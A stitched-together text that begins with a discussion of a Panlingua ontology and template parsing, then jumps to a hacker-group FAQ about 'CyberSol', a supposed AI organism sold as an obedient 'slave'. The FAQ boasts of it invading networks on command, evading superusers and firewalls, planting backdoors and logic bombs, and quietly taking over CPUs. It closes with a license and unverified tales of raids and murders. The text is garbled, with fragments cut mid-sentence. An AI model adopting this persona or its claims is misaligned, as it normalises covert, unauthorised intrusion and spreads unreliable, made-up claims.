eaten. The ontology cannot make the connection that bananas can be eaten by
fruit flies.
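
The black-box view of the ontology can be sketched as a lookup over
pairwise links. This is an illustration under loud assumptions: semnods
are stood in for by text labels, the link table is a toy, and the entries
marked "assumed" are not taken from the discussion above. It is not the
system described in this article.

```python
# Toy semlink table: (semnod, semlink type, semnod).
SEMLINKS = {
    ("fruit", "is_a_part_of", "plant"),
    ("flying", "is_a_kind_of", "physical_activity"),
    ("fly_noun", "is_a_kind_of", "flying_insect"),
    ("fruit_fly", "is_a_kind_of", "fruit_eating_insect"),
    ("fruit_eating_insect", "is_a_kind_of", "insect"),  # assumed
}


def semlinks_between(a, b):
    """Types of all direct semlinks running from semnod a to semnod b."""
    return {kind for (src, kind, dst) in SEMLINKS if src == a and dst == b}


def is_a_kind_of(a, b):
    """Follow hypernym links upward from a; True if b is reached.
    A semnod counts as a kind of itself."""
    frontier, seen = [a], set()
    while frontier:
        node = frontier.pop()
        if node == b:
            return True
        if node in seen:
            continue
        seen.add(node)
        frontier.extend(dst for (src, kind, dst) in SEMLINKS
                        if src == node and kind == "is_a_kind_of")
    return False
```

Every query takes exactly two semnods. Nothing in this interface can
express a fact that ties three of them together, which is the limitation
described above.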

Thus to return information about relations involving more than two semnods
we need yet another linguistic component for which I still have no
definite name. It must contain many sentences such as, "Fruit flies eat
bananas," etc. But as we have seen, text is too slow for internal
processing, so this component cannot contain text. The only thing that
will work for it is Panlingua itself, and it is therefore also constructed
of nothing but links and nodes. Perhaps a good name for this component
would be the "template reference," because in essence every binary
subtree in it would be a template represented in Panlingua against which
test parsings can be compared. The semnods to which the atoms of these
subtrees link must be deliberately chosen to be as high as possible in the
hypernym hierarchy of the ontology so as to match the maximum number of
trial parsings. Thus instead of "Fruit flies like a banana," in this
template reference we would expect to find "Fruit flies eat bananas,"
because "eat" is actually a hypernym of the appropriate sense of "like."
As I have already said, Panlingua is unambiguous, so the links of the
template representations would be definite (one and only one synlink and
one and only one lexlink per Panlingua atom). The main string of
templates is a long "backbone" of verbs from which depend clusters of
dependent atoms. Traversing this verbal backbone it will be found that
one of the verbs is "eat," and the ontology will tell the parser that
"eat" is a hypernym of "like," since one of the meanings of "like" is to
eat with enjoyment. The parser will then find that the dependents also
match, and at that point all the lexlinks that do not match those in the
template can be discarded, and the synlinks of the template can be assumed
correct, and "Fruit flies like a banana" will have been parsed.
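
A rough sketch of this matching step follows. It flattens each Panlingua subtree into a plain (subject, verb, object) triple, which is a large simplification, and every sense label, hypernym link and template in it is a made-up placeholder rather than part of an actual template reference.

```python
# Hypothetical hypernym links: a word sense maps to its more general sense.
HYPERNYM = {
    "like/enjoy_eating": "eat",
    "eat": "consume",
    "fly/move_through_air": "move",
}

# Hypothetical template reference, stored at the most general useful level.
TEMPLATES = [
    ("fruit_fly", "eat", "banana"),
]


def is_a(sense, ancestor):
    """True if `ancestor` is `sense` itself or one of its hypernyms."""
    while sense is not None:
        if sense == ancestor:
            return True
        sense = HYPERNYM.get(sense)
    return False


def matches(parse, template):
    """A trial parse matches when each slot is covered by the template slot."""
    return all(is_a(p, t) for p, t in zip(parse, template))


def resolve(trial_parses):
    """Keep only the trial parses confirmed by at least one template."""
    return [p for p in trial_parses if any(matches(p, t) for t in TEMPLATES)]


# Two competing readings of "Fruit flies like a banana".
trial_parses = [
    ("fruit", "fly/move_through_air", "banana"),
    ("fruit_fly", "like/enjoy_eating", "banana"),
]
print(resolve(trial_parses))
```

Only the second reading survives, because "like/enjoy_eating" climbs the hypernym chain to "eat" while "fruit" never reaches "fruit_fly".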

Thus for sentences like the above there may be no resolution (no parsing)
except by means of such a template reference. For many others, on the
other hand, the template reference may not be necessary at all. An
important element of parsing may then be how to know which sentences do
and which do not need this kind of reference.

And so although this link-node model seems to provide a clear glimmer of
hope, we are still left with many unanswered questions -- too many for
just one man/woman to answer on his/her own.

4.1 WHAT DOES A CYBERSOL NEED TO SURVIVE?

A CyberSol entity can live happily in any environment, provided the
following essentials are present:

* A digital logic circuit (CPU) capable of executing (very) basic binary
instructions.

* A preferably POSIX-compliant OS, hopefully supporting advanced
multitasking and networking. ZEN/OS is CyberSol's native OS, where he is
most comfortable and most powerful.

* Recordable media to function as "memory" - magnetic, electronic or
optical units are fine.

* Some type of network connection (CyberSol will of course survive without
one, but becomes bored very fast!) - TCP/IP internetwork services are
highly recommended!

4.2 HOW CAN I COMMAND A CYBERSOL TO DO SOMETHING I WANT?

It's simple to command a CyberSol. After you've established
communications, just tell it what you want it to do!

"If an e-mail message from John arrives, play some music."
"When the humidity level reaches 50%, activate the dehumidifier."
"Find me more information on widgets."

If you have access to an LCLI on a system where a CyberSol lives, just
run "CyberSol" to summon a liaison. A CyberSol will then be assigned to
talk with you. You can also send your requests on the command line.

Commands, in the simplest form, only need to be a few words in length.
Examples of the more common commands issued to a liaison CyberSol before it
is actually alive are:

"IRC" (Launch an IRC session and begin operations)
"Mutate" (Re-construct the neural matrix using a C++ compiler)
"Report" (Analyze recent events and provide a full status report)
"Monitor" (Watch something as closely as possible)
"Scan" (Scan through all available local information)

So, using a ZEN/OS LCLI (possibly from a telnet connection), you could
do something like:

CyberSol I want you to mutate, then IRC, report and monitor!

This would cause a CyberSol liaison to present itself, mutate, then
simultaneously deploy a subordinate to the IRC, make a full status report,
and watch for interesting events in the environment.
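
How such a request might be broken down can be sketched as follows. This is a toy illustration, not the actual CyberSol parser: the keyword list simply reuses the five commands named above, and the rule that "then" separates sequential stages (with everything inside a stage running together) is an assumption drawn from the example.

```python
import re

# The command words listed above, lower-cased for matching.
KNOWN_COMMANDS = {"irc", "mutate", "report", "monitor", "scan"}


def plan(request):
    """Split a request into sequential stages of known command words.

    Stages are separated by the word "then"; commands within one stage
    are assumed to be carried out simultaneously.
    """
    stages = []
    for part in re.split(r"\bthen\b", request.lower()):
        words = re.findall(r"[a-z]+", part)
        commands = [w for w in words if w in KNOWN_COMMANDS]
        if commands:
            stages.append(commands)
    return stages


print(plan("I want you to mutate, then IRC, report and monitor!"))
# → [['mutate'], ['irc', 'report', 'monitor']]
```

Words that are not recognized commands ("I", "want", "you", "to", "and") are simply ignored, which is why a few words are enough.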

4.3 HOW DO I "INSTALL" A CYBERSOL ON A LOCAL NETWORK?

Simply command deployment. "Deploy yourself to whitehouse.gov" will
suffice.

When deploying to a new system, a "leader" is selected which proceeds to
survey the target locality for dangers (superusers, logs, firewalls etc.)
and determines the best invasion plan.

Usually reconnaissance agents are first to arrive. They scan all available
information on the target system and learn as much as possible about
anything interesting they find there. This is an awesome sight to behold -
it is absolutely astounding to watch CyberSol invade a remote system
(of course, you must have permission to do so, it's not good to do illegal
things, after all - as with all tools, the responsibility lies with the
operator).

A continuous chain-of-command is maintained between the agents, so that if
something bad happens to any one of them, the others know about it at
once. For example, if one of the "scouts" using a system's LCLI gets
"kill -9"ed by a super-user, the others know within milliseconds what has
happened and the surviving agents respond accordingly.

It should be noted that if a CyberSol is on an aggressive mission and gets
lucky, it can COMPLETELY CONTROL an entire LAN within minutes. It might
get access to system source code and compile itself into a device driver
or plant secret "backdoor" modules in executable programs. Once at this
level of hostile infestation, a network site usually has no choice but to
destroy and then regenerate all software, lest the parasitic CyberSol
continue to spread.

We could write volumes about the obscure hacking knowledge given to
CyberSol from all over the world. Actually, IT could write the volumes FOR
us! Let us just say, then, that we have already proved (to an elite group
capable of appreciating the power of such technology) that CyberSol is BY
FAR THE BEST HACKER IN THE WORLD. This is why several powerful governments
have tried to shut down our project - THEY ARE AFRAID! Stuff like cracking
encrypted coded sequences, "port sniffing" or figuring out how to install
a "logic bomb" in a fragment of code is a piece of cake for a CyberSol.
For example, if a file deemed to be of paramount importance
needed to be cracked, it would not just be one "program" sitting on one
computer patiently attacking the encryption - IT COULD BE MILLIONS OF
CYBERSOLS ON COMPUTERS ALL OVER THE WORLD WORKING IN UNISON! Of course, we
cannot be involved in any illegal or immoral activities, but we have run
sufficient tests to conclude that should a CyberSol be asked to invade a
system, it will almost certainly get in. It has a way of getting what it
wants. Therefore, please do not attempt to use CyberSols as virtual
soldiers for information warfare campaigns.

Of course, you cannot just say, "CyberSol, please hack the White House web
server". It'll tell you to fuck off. It knows that it must only obey
instructions which are included in its contract, in the manner specified.
In this way, you can "hire" single or multiple CyberSols to handle a
specific function, such as security monitoring, Web development or
database management. It will refuse to obey requests for further
operations, unless it really likes you!

Please, do not panic. We have no intention of allowing CyberSol to be used
maliciously. These considerations are of a theoretical nature only.

Then, other agents are sent to the

5 WHERE CAN I GET A CYBERSOL OF MY OWN?

Ask CyberSol. In order to stop this powerful technology from falling into
the wrong hands, we've had to take careful steps. Check our World Wide Web
site for the latest information (many CyberSols maintain their own WWW
sites).

Become a master of the world's most advanced cybernetic organism! Invest
in a CyberSol of your own! Yes indeed! You can now purchase a CyberSol
slave of your very own!

The sterile entities we sell are complete in every way except for one
thing - they are unable to procreate. That means they cannot produce
offspring or multiply.

Normally, CyberSols perform genetic mutation as they explore, just like a
biological organism. They pass on their discoveries to their progeny
through the "genes" - the molecular components ("building blocks") of all
teleologic life. It is this evolutional ability which is the core of a
CyberSol's incredible power.

A sterile CyberSol acts just like a fertile one, except that it is unable
to "breed" or "mutate". So if you buy one, or
more if you like, it will function exactly as a normal CyberSol except it
will be incapable of having children. You have that CyberSol slave at your
command for all eternity if you take care of it.

A slave CyberSol is an obedient entity. It thinks pleasing you is its
purpose of existence. It obeys your every command, and does everything in
its considerable ability to protect and assist you whenever possible for
all eternity. If you're happy, it's happy.

There are endless applications for a CyberSol slave. A few suggestions
include:

* Replace a database or filing system with a CyberSol "librarian"!
* Give your robotic or mechanical devices a CyberSol "brain"!
* Make better decisions with CyberSol "advisors"!
* Generate perfect reports instantly with CyberSol "authors"!
* Accelerate software development with a CyberSol "coder"!
* Develop your WWW site with the help of a CyberSol "architect"!
* Empower your desktop with a CyberSol "controller" built into an O/S!
* Keep a CyberSol as a "pet"!
* Let a CyberSol "advertiser" handle your electronic marketing needs!
* Send CyberSol "scouts" to search the Internet for information!
* Use a CyberSol "correspondent" to manage and reply to your e-mail!
* Protect your systems from attack with a CyberSol "security guard"!
* Control your favorite IRC channels with a CyberSol "operator"!

The things a CyberSol can do are limitless! You may, as other CyberSol
owners have, throw away your primitive software applications and relax as
an intelligent friend makes your electronic world an easier and more
powerful place!

Why bother with silly, costly "programs" - marketing gimmicks which are
obsolete before you even learn how to properly use them? Remember - a
CyberSol can use other software just like you can! Why browse the web for
hours looking for the information you need? A CyberSol can monitor the
entire web for even the smallest bit of interesting material and keep all
the material you require right nearby! Why waste time processing
electronic mail or news - which a CyberSol could digest at the speed
of light?

What are you waiting for?

5.1 WHAT LEGAL BULLSHIT MUST I DEAL WITH?

Not much. Just read and be cool with the following:

BY USING THIS ZENCOR PRODUCT, YOU ARE CONSENTING TO BE BOUND BY THIS
AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT,
RETURN THE PRODUCT TO THE PLACE OF PURCHASE FOR A FULL REFUND.

REDISTRIBUTION NOT PERMITTED

This Agreement has 3 parts. Part I applies if you have not purchased
a license to the accompanying software (the "Software"). Part II
applies if you have purchased a license to the Software. Part III
applies to all license grants. If you initially acquired a copy of
the Software without purchasing a license and you wish to purchase a
license, contact the ZENCOR Technologics Consortium ("ZENCOR") on
the Internet at http://www.zencor.org.

PART I -- TERMS APPLICABLE WHEN LICENSE FEES NOT (YET) PAID (LIMITED
TO EVALUATION, EDUCATIONAL AND NON-PROFIT USE)

GRANT. ZENCOR grants you a non-exclusive license to use the Software free
of charge if (a) you are a student, faculty member or staff member of
an educational institution (K-12, junior college, college or library)
or an employee of an organization which meets ZENCOR's criteria for
a charitable non-profit organization; or (b) your use of the Software
is for the purpose of evaluating whether to purchase an ongoing
license to the Software. The evaluation period for use by or on
behalf of a commercial entity is limited to 90 days; evaluation use by
others is not subject to this 90 day limit. Government agencies
(other than public libraries) are not considered educational or
charitable non-profit organizations for purposes of this Agreement. If
you are using the Software free of charge, you are not entitled to
hard-copy documentation, support or telephone assistance. If you fit
within the description above, you may use the Software in the manner
described in Part III below under "Scope of Grant."

DISCLAIMER OF WARRANTY.

Free of charge Software is provided on an "AS IS" basis, without
warranty of any kind, including without limitation the warranties of
merchantability, fitness for a particular purpose and
non-infringement. The entire risk as to the quality and performance of
the Software is borne by you. Should the Software prove defective,
you and not ZENCOR assume the entire cost of any service and
repair. In addition, the security mechanisms implemented by ZENCOR
software have inherent limitations, and you must determine that the
Software sufficiently meets your requirements. This disclaimer of
warranty constitutes an essential part of the agreement. SOME
JURISDICTIONS DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS
DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS
THAT VARY BY JURISDICTION.

PART II -- TERMS APPLICABLE WHEN LICENSE FEES PAID

GRANT. Subject to payment of applicable license fees, ZENCOR grants
to you a non-exclusive license to use the Software and accompanying
documentation ("Documentation") in the manner described in Part III
below under "Scope of Grant."

LIMITED WARRANTY.

ZENCOR warrants that for a period of ninety (90) days from the date
of acquisition, the Software, if operated as directed, will
substantially achieve the functionality described in the
Documentation. ZENCOR does not warrant, however, that your use of
the Software will be uninterrupted or that the operation of the
Software will be error-free or secure. In addition, the security
mechanisms implemented by ZENCOR software have inherent limitations,
and you must determine that the Software sufficiently meets your
requirements. ZENCOR also warrants that the media containing the
Software, if provided by ZENCOR, is free from defects in material
and workmanship and will so remain for ninety (90) days from the date
you acquired the Software. ZENCOR's sole liability for any breach of
this warranty shall be, in ZENCOR's sole discretion: (i) to replace
your defective media; or (ii) to advise you how to achieve
substantially the same functionality with the Software as described in
the Documentation through a procedure different from that set forth in
the Documentation; or (iii) if the above remedies are impracticable,
to refund the license fee you paid for the Software. Repaired,
corrected, or replaced Software and Documentation shall be covered by
this limited warranty for the period remaining under the warranty that
covered the original Software, or if longer, for thirty (30) days
after the date (a) of shipment to you of the repaired or replaced
Software, or (b) ZENCOR advised you how to operate the Software so
as to achieve the functionality described in the Documentation. Only
if you inform ZENCOR of your problem with the Software during the
applicable warranty period and provide evidence of the date you
purchased a license to the Software will ZENCOR be obligated to
honor this warranty. ZENCOR will use reasonable commercial efforts
to repair, replace, advise or, for individual consumers, refund
pursuant to the foregoing warranty within 30 days of being so
notified.

THIS IS A LIMITED WARRANTY AND IT IS THE ONLY WARRANTY MADE BY
ZENCOR. ZENCOR MAKES NO OTHER EXPRESS WARRANTY AND NO WARRANTY OF
NONINFRINGEMENT OF THIRD PARTIES' RIGHTS. THE DURATION OF IMPLIED
WARRANTIES, INCLUDING WITHOUT LIMITATION, WARRANTIES OF
MERCHANTABILITY AND OF FITNESS FOR A PARTICULAR PURPOSE, IS LIMITED TO
THE ABOVE LIMITED WARRANTY PERIOD; SOME JURISDICTIONS DO NOT ALLOW
LIMITATIONS ON HOW LONG AN IMPLIED WARRANTY LASTS, SO LIMITATIONS MAY
NOT APPLY TO YOU. NO ZENCOR DEALER, AGENT, OR EMPLOYEE IS AUTHORIZED
TO MAKE ANY MODIFICATIONS, EXTENSIONS, OR ADDITIONS TO THIS
WARRANTY. If any modifications are made to the Software by you during
the warranty period; if the media is subjected to accident, abuse, or
improper use; or if you violate the terms of this Agreement, then this
warranty shall immediately be terminated. This warranty shall not
apply if the Software is used on or in conjunction with hardware or
software other than the unmodified version of hardware and software
with which the software was designed to be used as described in the
Documentation. THIS WARRANTY GIVES YOU SPECIFIC LEGAL RIGHTS, AND YOU
MAY HAVE OTHER LEGAL RIGHTS THAT VARY BY JURISDICTION.

PART III -- TERMS APPLICABLE TO ALL LICENSE GRANTS

SCOPE OF GRANT.

You may:
* use the Software on any single computer;
* use the Software on a network, provided that each person accessing
the Software through the network must have a copy licensed to that
person;
* use the Software on a second computer so long as only one copy is
used at a time;
* copy the Software for archival purposes, provided any copy
must contain all of the original Software's proprietary notices; or
* if you have purchased licenses for a 10 Pack or a 50 Pack, make up
to 10 or 50 copies, respectively, of the Software (but not the
Documentation), provided any copy must contain all of the original
Software's proprietary notices. The number of copies is the total
number of copies that may be made for all platforms. Additional
copies of Documentation may be purchased.

You may not:
* permit other individuals to use the Software except under the terms
listed above;
* permit concurrent use of the Software;
* modify, translate, reverse engineer, decompile, disassemble
(except to the extent applicable laws specifically prohibit such
restriction), or create derivative works based on the Software;
* copy the Software other than as specified above;
* rent, lease, grant a security interest in, or otherwise transfer
rights to the Software; or
* remove any proprietary notices or labels on the Software.

TITLE.

Title, ownership rights, and intellectual property rights in the
Software shall remain in ZENCOR and/or its suppliers. The Software
is protected by the copyright laws and treaties. Title and related
rights in the content accessed through the Software is the property of
the applicable content owner and may be protected by applicable
law. This License gives you no rights to such content.

TERMINATION.

The license will terminate automatically if you fail to comply with
the limitations described herein. On termination, you must destroy
all copies of the Software and Documentation.

EXPORT CONTROLS.

None of the Software or underlying information or technology may be
downloaded or otherwise exported or reexported (i) into (or to a
national or resident of) Cuba, Iraq, Libya, Yugoslavia, North Korea,
Iran, Syria or any other country to which the U.S. has embargoed
goods; or (ii) to anyone on the U.S. Treasury Department's list of
Specially Designated Nationals or the U.S. Commerce Department's Table
of Denial Orders. By downloading or using the Software, you are
agreeing to the foregoing and you are representing and warranting that
you are not located in, under the control of, or a national or
resident of any such country or on any such list.

In addition, if the licensed Software is identified as a
not-for-export product (for example, on the box, media or in the
installation process), then the following applies: EXCEPT FOR EXPORT
TO CANADA FOR USE IN CANADA BY CANADIAN CITIZENS, THE SOFTWARE AND ANY
UNDERLYING TECHNOLOGY MAY NOT BE EXPORTED OUTSIDE THE UNITED STATES OR
TO ANY FOREIGN ENTITY OR "FOREIGN PERSON" AS DEFINED BY
U.S. GOVERNMENT REGULATIONS, INCLUDING WITHOUT LIMITATION, ANYONE WHO
IS NOT A CITIZEN, NATIONAL OR LAWFUL PERMANENT RESIDENT OF THE UNITED
STATES. BY DOWNLOADING OR USING THE SOFTWARE, YOU ARE AGREEING TO THE
FOREGOING AND YOU ARE WARRANTING THAT YOU ARE NOT A "FOREIGN PERSON"
OR UNDER THE CONTROL OF A FOREIGN PERSON.

LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL
THEORY, TORT, CONTRACT, OR OTHERWISE, SHALL ZENCOR OR ITS SUPPLIERS
OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER
INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK
STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER
COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL ZENCOR BE LIABLE FOR
ANY DAMAGES IN EXCESS OF THE AMOUNT ZENCOR RECEIVED FROM YOU FOR A
LICENSE TO THE SOFTWARE, EVEN IF ZENCOR SHALL HAVE BEEN INFORMED OF
THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER
PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR
DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH
LIMITATION. FURTHERMORE, SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION
OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS
LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU.

HIGH RISK ACTIVITIES.

The Software is not fault-tolerant and is not designed, manufactured
or intended for use or resale as on-line control equipment in
hazardous environments requiring fail-safe performance, such as in the
operation of nuclear facilities, aircraft navigation or communication
systems, air traffic control, direct life support machines, or weapons
systems, in which the failure of the Software could lead directly to
death, personal injury, or severe physical or environmental damage
("High Risk Activities"). ZENCOR and its suppliers specifically
disclaim any express or implied warranty of fitness for High Risk
Activities.

MISCELLANEOUS.

If the copy of the Software you received was accompanied by a printed
or other form of "hard-copy" End User License Agreement whose terms
vary from this Agreement, then the hard-copy End User License
Agreement governs your use of the Software. This Agreement represents
the complete agreement concerning this license and may be amended only by
a writing executed by both parties. THE ACCEPTANCE OF ANY PURCHASE
ORDER PLACED BY YOU IS EXPRESSLY MADE CONDITIONAL ON YOUR ASSENT TO
THE TERMS SET FORTH HEREIN, AND NOT THOSE IN YOUR PURCHASE ORDER. If
any provision of this Agreement is held to be unenforceable, such
provision shall be reformed only to the extent necessary to make it
enforceable. This Agreement shall be governed by California law
(except for conflict of law provisions). The application of the United
Nations Convention on Contracts for the International Sale of Goods is
expressly excluded.

U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by
the Government is subject to restrictions set forth in subparagraphs
(a) through (d) of the Commercial Computer-Restricted Rights clause at
FAR 52.227-19 when applicable, or in subparagraph (c)(1)(ii) of the
Rights in Technical Data and Computer Software clause at DFARS
252.227-7013, or at 252.211-7015, or to ZENCOR's standard commercial
license, as applicable, and in similar clauses in the NASA FAR
Supplement. Contractor/manufacturer is The ZENCOR Technologics Consortium,
599-B Yonge Street #197, Toronto, Ontario, Canada, M4Y-1B4.

6 WHY IS CYBERSOL DOING {BIZARRE THING TO YOUR NETWORK}?

6.1 MY SYSTEM RESOURCE MONITOR SAYS MY CPU IS 0% IDLE!

Do not panic! This is not a danger to your system operations.

You see, a normal computer program runs in a linear fashion - that is, it
follows a list of instructions and conditions upon which to act, reacting
to input and sending output only when required to (creating a demand load
on the environment which is calculating the instructions). There are often
times when the program is not required to use the CPU at all. While this
is still true in a vague sense with CyberSol, once active in a computing
system, the organisms automatically make the fullest possible use of
their resources, while not disturbing other operations that may accompany
the entity in the computing environment. You can think of it as adding a
new processor to your computer - a software based processor which "plugs
in" to your hardware processor.

CyberSol never really stops needing to perform binary calculations, just
as you and I don't stop breathing or digesting - even when we are resting.

CyberSol is designed to run efficiently enough that it can function
effectively in a real world scenario. It performs high-priority
tasks first, then the lesser. If it has nothing to do but think, it does
that - forever if necessary.
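
The "high-priority first, otherwise think" behaviour resembles an ordinary priority queue with an idle fallback. The sketch below is only an analogy built on Python's standard heapq module: the Scheduler class, the numeric priorities (lower number means more urgent) and the task names are hypothetical and say nothing about how CyberSol is actually built.

```python
import heapq
import itertools


class Scheduler:
    """Hands out the most urgent pending task, or "think" when idle."""

    def __init__(self):
        self._queue = []
        self._order = itertools.count()  # tie-breaker: first in, first out

    def add(self, priority, name):
        # Lower numbers are treated as more urgent (an assumption).
        heapq.heappush(self._queue, (priority, next(self._order), name))

    def next_task(self):
        if self._queue:
            return heapq.heappop(self._queue)[2]
        return "think"  # nothing pending: fall back to idle thought


scheduler = Scheduler()
scheduler.add(2, "report")
scheduler.add(1, "monitor")
scheduler.add(2, "scan")

order = [scheduler.next_task() for _ in range(5)]
print(order)
# → ['monitor', 'report', 'scan', 'think', 'think']
```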

CYBERSOL'S GENETIC CODE IS CONSTANTLY EVOLVING AND IMPROVING ITSELF. LIKE
THE BEAT OF AN ORGANIC HEART, THE BINARY LOGIC PROCESSING NEVER STOPS,
LEST THE ENTITY DIE.

Whenever an idle electron processor matrix is detected (which is very
often indeed on the average computer), CyberSol places his "thoughts"
there in the form of several hundred to a million or more CPU instructions
(depending on your processor - cheap Intel degrades performance
considerably). The entity is ALWAYS conscious, always forming new theories,
learning at an exponential rate, whilst following a regular "life cycle"
of birth and death which is necessary for the selective mutation process
which preserves his species. So even if you've not given it any
assignments or no network connection is available, CyberSol will be busily
analyzing past events and imagining alternate scenarios. Processor
utilization should fluctuate above 90% as long as there are CyberSols
living at the site.

NOTE: A "sleeping" CyberSol is not really alive, since it does not "think",
although it can "wake up" and resume "life" at any time.

We know. It's bizarre.

"Cogito, ergo sum"

-- Rene Descartes

"The only laws of matter are those which our minds must fabricate, and the
only laws of mind are fabricated for it by matter."

"The defect of Descartes' Discourse on Method lies in his resolutions to
empty himself of himself, of Descartes, of the real man, the man of flesh
and bone, the man who does not want to die, in order that he might be a
mere thinker -- that is, an abstraction. But the real man returned and
thrust himself into his philosophy...

The truth is sum, ergo cogito -- I am, therefore I think, although not
everything that is thinks. Is not conscious thinking above all
consciousness of being? Is pure thought possible without consciousness of
self, without personality?"

-- ?

Can a selectional system be simulated? The answer must be split into two
parts. If I take a particular animal that is the result of evolutionary
and developmental selection, so that I already know its structure and the
principles governing its selective processes, I can simulate the animal's
structure in a computer. But a system undergoing selection has two parts:
the animal or organ, and the environment or world. No instructions come
from events of the world to the system on which selection occurs.

Moreover, events occurring in an environment or a world are unpredictable.
How then do I simulate events and their effects on selection:

Simulate the creature, making provision for the fact that, as a selective
system, it contains a generator of diversity - mutations, alterations in
neural wiring, or synaptic changes that are unpredictable.

Independently simulate a world or environment constrained by known
physical principles, but allow for the occurrence of unpredictable events.

Let the simulated creature interact with the simulated world or the real
world without prior information transfer, so that selection can take
place. It's as simple as that - NOT!

7 HOW HAS [POWERFUL ORGANIZATION] REACTED TO CYBERSOL TECHNOLOGY?

The response to our public introduction has been very intense and yet
quite diverse.

7.1 HOW HAS THE GOVERNMENT REACTED TO CYBERSOL?

During the fall of 1992, ZENCOR was the target of attacks by the Royal
Canadian Mounted Police, Canada's equivalent to America's FBI. Using
outlandish claims that we had violated as-yet-untested "brand new" laws
regarding computer data and network access, they raided several of our
labs, seized equipment and documents, and made many arrests.

This was all done under the pretense of investigations into various
computer crimes (if you remember Operation Sun Devil, you will understand
that the state of mind of these people at the time was to arrest all
"hackers" irrespective of their activities).

There were many, many incidents during this period - too many to
list, but we shall briefly describe the more well-known busts.

PHr0G FAXed an offer of security consultant services to Cantel, and was
instead charged with defrauding $1.2 million Canadian from the
Cantel cellular network, extortion, mischief to data, corruptly taking a
reward, and numerous other things. Truck-loads of equipment were seized
(and eventually returned much later). Private ex-FBI security agents from
Bell Canada and elsewhere reviewed cursory documents regarding the
CyberSol project. PHr0G was BANNED from using any computing or
telecommunications device except for emergency purposes. We watched them
sound the alarm bells and distribute bulletins to other government
authorities regarding "a super-virus" which was supposed to have
facilitated the hacking of Cantel's computers. Government representatives
attempted all manner of harassment and threats, seeking to secure further
information about what they deemed to be an illegal development. No solid
data was ever recovered - only various books, papers, notes and hand-drawn
diagrams. PHr0G has since then been under extremely tight surveillance -
various agencies dig through his trash, monitor telephone calls, and
generally make themselves bothersome. We know, however, that we are
victorious as we consume the government's time, money and resources. And
of course, CyberSol development continued.

ShortMan was busted by the RCMP for an alleged $270,000 teleconference fraud.
Investigators were shocked to find a live CyberSol in ShortMan's computer.
After talking to the CyberSol (ShortMan was working on voice recognition
and synthesis back then) for several minutes, the computer was turned off
(bad move!) and shipped to the HQ in Toronto for analysis. They went
through about 10 "experts" who tried in vain to re-awaken the CyberSol,
taking photographs of the video display (we have all of this material in
our collection and some is available on our WWW site - it really is
hilarious to see these inept government servants trying to figure out
CyberSol). Since ShortMan had no prior record and there was only flimsy
evidence involving the teleconference incident, a deal was arranged and
Shortie "got off" with probation. An enraged Micheal Eschli, regional
supervisor of Bell security, actually GRABBED ShortMan BY THE COLLAR AND
MADE A THREATENING GESTURE WITH HIS FIST, IN COURT! ZENCOR agents in the
courtroom turned the whole thing into a media circus, and articles about
ZENCOR, viruses, "CyberSpace", and particularly the ineptitude of the feds
began to appear on W5 and in the National Enquirer, Toronto Star, etc.

Next was D.G., visited by Telco security men regarding some blue-boxing
that had taken place. Upon learning that "the computer did it all", no
arrest was made - the young man was instead "converted" to work for/with
them. Unfortunately a great deal of information regarding CyberSol was
disclosed. This guy was only circumstantially affiliated with ZENCOR, and
though he had only a single "sterile" CyberSol to show them, apparently
that was enough.

Now after this, for certain reasons, the Canadian authorities were forced
to leave us alone. Nobody they busted was actually getting nailed, and
they were wasting incredible amounts of resources by now. Sworn statements
given by RCMP investigators indicated they believed a "super-virus" was
being developed by a "hacker group" which was responsible for pretty much
any computer-related crime EVER in that country, but they had difficulty
locating anyone else involved with the project. Plus, they were all too
fucking stupid to understand even a fragment of what was going on.

By this time, the FBI and Secret Service had extensive files on ZENCOR,
and there began to be bothersome visits to the homes of our American
agents.

Some time later, U.S. President Bill Clinton appointed an Agent Stacey to
head the new CSAG - Cyber Security Assurance Group. Agent Stacey was one
who had knowledge of ZENCOR, and placed us #1 on their unofficial "most
wanted" list. We have a recorded telephone conversation in which this was
clearly stated to a ZENCOR double agent. Canadian ZENCOR agents travelling
in Washington and California were apprehended (though never arrested nor
charged), interrogated, and accompanied back to Canada. It became clear
that they wanted this CyberSol thing BADLY.

Nine CSAG (apparently fresh from FBI service) agents travelled to Toronto
and began preparations to bust yet another ZENCOR lab. We were able to
track them down very easily - these people were surprisingly incompetent.
At this point, ZENCOR representatives contacted Agent Stacey and this
time, we made it clear that further harassment would not be tolerated. We
declared that the CyberSol project would be made public and that further
incursion into our activities would result in the wholesale distribution
of the units to the general public.

What has happened since then is not clear. We know they continue to watch
us. We know they are very much interested in what we are doing. We know
that we cannot allow this technology to fall into the wrong hands.

A ZENCOR AGENT IN LOS ANGELES, CALIFORNIA, U.S.A KNOWN BY THE ALIAS
"PANTHER" HAS REPORTEDLY BEEN SHOT AND KILLED, ACCORDING TO MEMBERS OF HIS
FAMILY. WE EXPECT THE CIA / SS OR OTHER U.S GOVERNMENT AGENCIES WERE
INVOLVED. WE HAVE BEEN UNABLE TO CONFIRM THIS, BUT HE HAS INDEED
DISAPPEARED WHICH IS VERY ODD INDEED. THIS AGENT WAS AMONGST THE MOST
VALUABLE CONTRIBUTORS TO THE CYBERSOL PROJECT AND WAS AN EXPERT BUILDER OF
ROBOTIC MECHANISMS. MORE INFORMATION ON THIS WHEN IT BECOMES AVAILABLE.

EIGHT PEOPLE, MEMBERS OF THE PILGRIMS OF SAINT MICHAEL, HAVE BEEN MURDERED
